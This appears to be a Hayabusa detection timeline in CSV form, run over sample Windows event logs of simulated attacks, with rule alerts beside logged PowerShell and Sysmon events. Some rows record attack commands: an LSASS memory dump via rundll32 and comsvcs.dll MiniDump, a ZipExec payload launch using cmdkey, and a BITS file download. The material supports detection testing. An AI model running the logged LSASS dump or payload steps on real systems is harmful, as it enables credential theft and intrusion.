+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"param( [Parameter(ValueFromPipeline=$true)] [string[]] $verb = '*' ) begin { $allVerbs = [PSObject].Assembly.GetTypes() | Where-Object {$_.Name -match '^Verbs.'} | Get-Member -type Properties -static | Select-Object @{ Name='Verb' Expression = {$_.Name} }, @{ Name='Group' Expression = { $str = ""$($_.TypeName)"" $str.Substring($str.LastIndexOf('Verbs') + 5) } } } process { foreach ($v in $verb) { $allVerbs | Where-Object { $_.Verb -like $v } } } # .Link # http://go.microsoft.com/fwlink/?LinkID=160712 # .ExternalHelp System.Management.Automation.dll-help.xml",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[CmdletBinding()] param( [ValidateRange(2, 2147483647)] [int] ${Width}, [Parameter(ValueFromPipeline=$true)] [psobject] ${InputObject}) begin { try { $PSBoundParameters['Stream'] = $true $wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand('Out-String',[System.Management.Automation.CommandTypes]::Cmdlet) $scriptCmd = {& $wrappedCmd @PSBoundParameters } $steppablePipeline = $scriptCmd.GetSteppablePipeline($myInvocation.CommandOrigin) $steppablePipeline.Begin($PSCmdlet) } catch { throw } } process { try { $steppablePipeline.Process($_) } catch { throw } } end { try { $steppablePipeline.End() } catch { throw } } <# .ForwardHelpTargetName Out-String .ForwardHelpCategory Cmdlet #>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location A:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location B:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location C:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location D:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location E:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location F:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location G:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location H:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location I:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location J:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location K:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location L:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location M:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location N:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location O:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location P:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location Q:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location R:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location S:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location T:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location U:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location V:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location W:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location X:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location Y:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location Z:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location ..,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location \,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Read-Host 'Press Enter to continue...' | Out-Null,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.302 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,$this.ServiceName,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.302 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[System.Management.ManagementDateTimeConverter]::ToDateTime($args[0]),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.302 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[System.Management.ManagementDateTimeConverter]::ToDmtfDateTime($args[0]),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\vtnr8kff.dmp full;Wait-Process -Id (Get-Process rundll32).id",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,CredAccess,PowerShell Get-Process LSASS in ScriptBlock,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,Exec,Suspicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.396 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"@{ GUID=""EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"" Author=""Microsoft Corporation"" CompanyName=""Microsoft Corporation"" Copyright=""© Microsoft Corporation. All rights reserved."" ModuleVersion=""3.1.0.0"" PowerShellVersion=""3.0"" CLRVersion=""4.0"" NestedModules=""Microsoft.PowerShell.Commands.Management.dll"" HelpInfoURI = 'http://go.microsoft.com/fwlink/?linkid=285756' CmdletsToExport=@(""Add-Content"", ""Clear-Content"", ""Clear-ItemProperty"", ""Join-Path"", ""Convert-Path"", ""Copy-ItemProperty"", ""Get-EventLog"", ""Clear-EventLog"", ""Write-EventLog"", ""Limit-EventLog"", ""Show-EventLog"", ""New-EventLog"", ""Remove-EventLog"", ""Get-ChildItem"", ""Get-Content"", ""Get-ItemProperty"", ""Get-WmiObject"", ""Invoke-WmiMethod"", ""Move-ItemProperty"", ""Get-Location"", ""Set-Location"", ""Push-Location"", ""Pop-Location"", ""New-PSDrive"", ""Remove-PSDrive"", ""Get-PSDrive"", ""Get-Item"", ""New-Item"", ""Set-Item"", ""Remove-Item"", ""Move-Item"", ""Rename-Item"", ""Copy-Item"", ""Clear-Item"", ""Invoke-Item"", ""Get-PSProvider"", ""New-ItemProperty"", ""Split-Path"", ""Test-Path"", ""Get-Process"", ""Stop-Process"", ""Wait-Process"", ""Debug-Process"", ""Start-Process"", ""Remove-ItemProperty"", ""Remove-WmiObject"", ""Rename-ItemProperty"", ""Register-WmiEvent"", ""Resolve-Path"", ""Get-Service"", ""Stop-Service"", ""Start-Service"", ""Suspend-Service"", ""Resume-Service"", ""Restart-Service"", ""Set-Service"", ""New-Service"", ""Set-Content"", ""Set-ItemProperty"", ""Set-WmiInstance"", ""Get-Transaction"", ""Start-Transaction"", ""Complete-Transaction"", ""Undo-Transaction"", ""Use-Transaction"", ""New-WebServiceProxy"", ""Get-HotFix"", ""Test-Connection"", ""Enable-ComputerRestore"", ""Disable-ComputerRestore"", ""Checkpoint-Computer"", ""Get-ComputerRestorePoint"", ""Restart-Computer"", ""Stop-Computer"", ""Restore-Computer"", ""Add-Computer"", ""Remove-Computer"", ""Test-ComputerSecureChannel"", ""Reset-ComputerMachinePassword"", ""Rename-Computer"", ""Get-ControlPanelItem"", ""Show-ControlPanelItem"") }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.396 +09:00,FS03.offsec.lan,4104,low,Persis,Suspicious Get-WmiObject,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_gwmi.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.396 +09:00,FS03.offsec.lan,4104,high,Exec,Suspicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.427 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Process): ""Get-Process"" ParameterBinding(Get-Process): name=""Name""; value=""lsass""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.427 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Process): ""Get-Process"" ParameterBinding(Get-Process): name=""Name""; value=""rundll32""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: cscript.exe //e:jscript testme.js | Process: C:\Windows\System32\cscript.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x779c2 | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec,WSF/JSE/JS/VBA/VBE File Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmdkey.exe"" /generic:Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip /pass:tWIMmIF /user:"""" | Process: C:\Windows\System32\cmdkey.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 15156 | PGUID: 00247C92-94D6-6171-0000-00103F5A967B",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec | Evas,Suspicious ZipExec Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,LatMov,Remote Desktop Protocol Use Mstsc,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mstsc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:03.398 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\lync.zip | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:12.523 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:12.549 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe | Process: C:\windows\system32\cscript.exe | PID: 28176 | PGUID: 00247C92-94D6-6171-0000-00100514967B,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe"" | Process: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 17264 | PGUID: 00247C92-94E0-6171-0000-00107424987B",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,high,Exec,Script Interpreter Execution From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,medium,Evas,Renamed Binary,,../hayabusa-rules/sigma/process_creation/proc_creation_win_renamed_binary.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,medium,Impact,Run from a Zip File,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_from_zip.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmdkey.exe"" /delete Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip | Process: C:\Windows\System32\cmdkey.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: cscript.exe //e:jscript testme.js | LID: 0x779c2 | PID: 19000 | PGUID: 00247C92-94E0-6171-0000-0010B84D987B",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec | Evas,Suspicious ZipExec Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:14.015 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" popup ""Malicious Behavior Detection Alert"" ""Elastic Security detected Execution via Renamed Signed Binary Proxy"" ""C:\Program Files\Elastic\Endpoint\cache\resources\elastic-endpoint-security.png"" | Process: C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" run | LID: 0x779c2 | PID: 26868 | PGUID: 00247C92-94E0-6171-0000-00104337987B",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 02:38:36.711 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md -Destination C:\Users\bits.ps1,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx
+2021-10-22 02:38:36.711 +09:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx
+2021-10-22 02:38:36.742 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Join-Path): ""Join-Path"" ParameterBinding(Join-Path): name=""Path""; value=""C:\windows\system32\windowspowershell\v1.0\Modules\BitsTransfer"" ParameterBinding(Join-Path): name=""ChildPath""; value=""Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx
